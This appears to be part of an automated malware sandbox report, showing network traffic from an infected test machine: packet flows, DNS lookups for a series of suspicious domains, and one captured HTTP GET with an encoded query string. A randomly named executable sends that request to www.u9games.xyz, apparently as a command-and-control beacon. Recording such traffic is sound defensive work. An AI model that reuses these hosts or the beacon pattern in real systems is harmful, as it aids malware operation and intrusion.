Jul 11, 2024 15:07:31.763227940 CEST | 80 | 49749 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:31.763406038 CEST | 49749 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:32.434736013 CEST | 49749 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:33.473323107 CEST | 49750 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:33.478374958 CEST | 80 | 49750 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:33.481425047 CEST | 49750 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:33.501312971 CEST | 49750 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:33.506899118 CEST | 80 | 49750 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:34.281130075 CEST | 80 | 49750 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:34.323153973 CEST | 49750 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:34.331671953 CEST | 80 | 49750 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:34.331716061 CEST | 49750 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:35.013322115 CEST | 49750 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:36.252640009 CEST | 49751 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:36.261349916 CEST | 80 | 49751 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:36.261449099 CEST | 49751 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:36.295028925 CEST | 49751 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:36.301656008 CEST | 80 | 49751 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:36.301687956 CEST | 80 | 49751 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:37.095194101 CEST | 80 | 49751 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:37.145203114 CEST | 80 | 49751 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:37.145411015 CEST | 49751 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:37.809335947 CEST | 49751 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:38.846180916 CEST | 49752 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:38.851262093 CEST | 80 | 49752 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:38.851345062 CEST | 49752 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:38.871550083 CEST | 49752 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:38.876611948 CEST | 80 | 49752 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:39.656439066 CEST | 80 | 49752 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:39.704636097 CEST | 80 | 49752 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:39.705599070 CEST | 49752 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:39.709604025 CEST | 49752 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:39.714782953 CEST | 80 | 49752 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:45.090471029 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.095383883 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.101345062 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.121443987 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.127480984 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734488964 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734533072 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734566927 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734601974 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.734708071 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734741926 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734776020 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734810114 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734854937 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.734882116 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734915972 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.734951019 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.735038042 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.735357046 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.739643097 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.739748955 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.739861012 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.831650972 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.831715107 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.831784010 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:45.833199978 CEST | 80 | 49753 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:45.833636999 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:46.623470068 CEST | 49753 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:47.657917976 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:47.662992954 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:47.664155960 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:47.687247992 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:47.692276001 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272490025 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272509098 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272603035 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.272612095 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272625923 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272638083 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272650003 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272663116 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272674084 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272777081 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.272777081 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.272777081 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.272932053 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.272943974 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.273156881 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.277702093 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.277729988 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.277743101 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.277776957 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.323226929 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.360429049 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.360580921 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.360594988 CEST | 80 | 49754 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:48.360707998 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:48.360707998 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:49.203634024 CEST | 49754 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.241648912 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.246762037 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.246825933 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.276890039 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.283454895 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.283467054 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.859935045 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.859982967 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.859993935 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860023022 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.860222101 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860233068 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860243082 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860255003 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860272884 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.860305071 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.860724926 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860737085 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860749006 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.860773087 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.860805035 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.865112066 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.865557909 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.865628004 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:50.954102993 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.954139948 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.954152107 CEST | 80 | 49755 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:50.954283953 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:51.794049978 CEST | 49755 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:52.829062939 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:52.834033966 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:52.834167004 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:52.855523109 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:52.860551119 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434295893 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434313059 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434324980 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434334993 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434448957 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.434474945 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434484959 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434520006 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.434578896 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.434590101 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434600115 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434611082 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.434669018 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.434748888 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.435050011 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.439491987 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.439630032 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.439640045 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.439675093 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.479417086 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.521435976 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.521608114 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.521761894 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.522242069 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Jul 11, 2024 15:07:53.525480986 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.531378031 CEST | 49756 | 80 | 192.168.2.6 | 162.254.38.56
Jul 11, 2024 15:07:53.536086082 CEST | 80 | 49756 | 162.254.38.56 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 11, 2024 15:05:38.886055946 CEST | 55549 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:05:38.903593063 CEST | 53 | 55549 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:00.139414072 CEST | 62636 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:00.456995964 CEST | 53 | 62636 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:16.376205921 CEST | 54246 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:16.700287104 CEST | 53 | 54246 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:30.095431089 CEST | 55455 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:31.088874102 CEST | 55455 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:32.104456902 CEST | 55455 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:32.594490051 CEST | 53 | 55455 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:32.594628096 CEST | 53 | 55455 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:32.594638109 CEST | 53 | 55455 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:46.152391911 CEST | 61465 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:46.226650000 CEST | 53 | 61465 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:06:59.705275059 CEST | 63717 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:06:59.723392963 CEST | 53 | 63717 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:07:14.856864929 CEST | 53791 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:07:14.873545885 CEST | 53 | 53791 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:07:28.635606050 CEST | 49918 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:07:29.652071953 CEST | 49918 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:07:30.652074099 CEST | 49918 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:07:30.881448030 CEST | 53 | 49918 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:07:30.881674051 CEST | 53 | 49918 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:07:30.881932974 CEST | 53 | 49918 | 1.1.1.1 | 192.168.2.6
Jul 11, 2024 15:07:44.743383884 CEST | 59162 | 53 | 192.168.2.6 | 1.1.1.1
Jul 11, 2024 15:07:45.077600956 CEST | 53 | 59162 | 1.1.1.1 | 192.168.2.6
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Jul 11, 2024 15:05:38.886055946 CEST | 192.168.2.6 | 1.1.1.1 | 0xe1fe | Standard query (0) | www.u9games.xyz | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:00.139414072 CEST | 192.168.2.6 | 1.1.1.1 | 0x4bc5 | Standard query (0) | www.dtalusering.com | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:16.376205921 CEST | 192.168.2.6 | 1.1.1.1 | 0x19ee | Standard query (0) | www.alphacentura.com | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:30.095431089 CEST | 192.168.2.6 | 1.1.1.1 | 0x1da1 | Standard query (0) | www.xn72dkd7scx.shop | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:31.088874102 CEST | 192.168.2.6 | 1.1.1.1 | 0x1da1 | Standard query (0) | www.xn72dkd7scx.shop | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.104456902 CEST | 192.168.2.6 | 1.1.1.1 | 0x1da1 | Standard query (0) | www.xn72dkd7scx.shop | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:46.152391911 CEST | 192.168.2.6 | 1.1.1.1 | 0x770d | Standard query (0) | www.dynamologistics.net | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:59.705275059 CEST | 192.168.2.6 | 1.1.1.1 | 0x6e4f | Standard query (0) | www.globaltrend.xyz | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:14.856864929 CEST | 192.168.2.6 | 1.1.1.1 | 0xa228 | Standard query (0) | www.ffi07s.xyz | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:28.635606050 CEST | 192.168.2.6 | 1.1.1.1 | 0xc2a6 | Standard query (0) | www.j51a.xyz | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:29.652071953 CEST | 192.168.2.6 | 1.1.1.1 | 0xc2a6 | Standard query (0) | www.j51a.xyz | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.652074099 CEST | 192.168.2.6 | 1.1.1.1 | 0xc2a6 | Standard query (0) | www.j51a.xyz | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:44.743383884 CEST | 192.168.2.6 | 1.1.1.1 | 0x528c | Standard query (0) | www.dospole.top | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Jul 11, 2024 15:05:38.903593063 CEST | 1.1.1.1 | 192.168.2.6 | 0xe1fe | No error (0) | www.u9games.xyz | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:05:38.903593063 CEST | 1.1.1.1 | 192.168.2.6 | 0xe1fe | No error (0) | ghs.googlehosted.com | | 142.250.186.115 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:00.456995964 CEST | 1.1.1.1 | 192.168.2.6 | 0x4bc5 | No error (0) | www.dtalusering.com | | 103.42.108.46 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:16.700287104 CEST | 1.1.1.1 | 192.168.2.6 | 0x19ee | No error (0) | www.alphacentura.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:16.700287104 CEST | 1.1.1.1 | 192.168.2.6 | 0x19ee | No error (0) | www.alphacentura.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.594490051 CEST | 1.1.1.1 | 192.168.2.6 | 0x1da1 | No error (0) | www.xn72dkd7scx.shop | weien.cdn.youziyuncdn.com | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.594490051 CEST | 1.1.1.1 | 192.168.2.6 | 0x1da1 | No error (0) | weien.cdn.youziyuncdn.com | | 134.122.138.60 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.594628096 CEST | 1.1.1.1 | 192.168.2.6 | 0x1da1 | No error (0) | www.xn72dkd7scx.shop | weien.cdn.youziyuncdn.com | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.594628096 CEST | 1.1.1.1 | 192.168.2.6 | 0x1da1 | No error (0) | weien.cdn.youziyuncdn.com | | 134.122.138.60 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.594638109 CEST | 1.1.1.1 | 192.168.2.6 | 0x1da1 | No error (0) | www.xn72dkd7scx.shop | weien.cdn.youziyuncdn.com | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:32.594638109 CEST | 1.1.1.1 | 192.168.2.6 | 0x1da1 | No error (0) | weien.cdn.youziyuncdn.com | | 134.122.138.60 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:46.226650000 CEST | 1.1.1.1 | 192.168.2.6 | 0x770d | No error (0) | www.dynamologistics.net | | 35.212.86.52 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:59.723392963 CEST | 1.1.1.1 | 192.168.2.6 | 0x6e4f | No error (0) | www.globaltrend.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:06:59.723392963 CEST | 1.1.1.1 | 192.168.2.6 | 0x6e4f | No error (0) | www.globaltrend.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:14.873545885 CEST | 1.1.1.1 | 192.168.2.6 | 0xa228 | No error (0) | www.ffi07s.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:14.873545885 CEST | 1.1.1.1 | 192.168.2.6 | 0xa228 | No error (0) | www.ffi07s.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881448030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | www.j51a.xyz | huayang.302.gn301.xyz | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881448030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.222.238.52 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881448030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 172.247.15.110 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881448030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 172.247.21.75 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881448030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.12.34.91 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881448030 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.12.34.252 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881674051 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | www.j51a.xyz | huayang.302.gn301.xyz | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881674051 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.222.238.52 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881674051 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 172.247.15.110 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881674051 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 172.247.21.75 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881674051 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.12.34.91 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881674051 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.12.34.252 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881932974 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | www.j51a.xyz | huayang.302.gn301.xyz | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881932974 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.222.238.52 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881932974 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 172.247.15.110 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881932974 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 172.247.21.75 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881932974 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.12.34.91 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:30.881932974 CEST | 1.1.1.1 | 192.168.2.6 | 0xc2a6 | No error (0) | huayang.302.gn301.xyz | | 154.12.34.252 | A (IP address) | IN (0x0001) | false
                                    Jul 11, 2024 15:07:45.077600956 CEST | 1.1.1.1 | 192.168.2.6 | 0x528c | No error (0) | www.dospole.top | | 162.254.38.56 | A (IP address) | IN (0x0001) | false
                                    • www.u9games.xyz
                                    • www.dtalusering.com
                                    • www.alphacentura.com
                                    • www.xn72dkd7scx.shop
                                    • www.dynamologistics.net
                                    • www.globaltrend.xyz
                                    • www.ffi07s.xyz
                                    • www.j51a.xyz
                                    • www.dospole.top
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.6 | 49718 | 142.250.186.115 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:05:38.936362028 CEST | 578 | OUT | GET /5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.u9games.xyz
                                    Connection: close
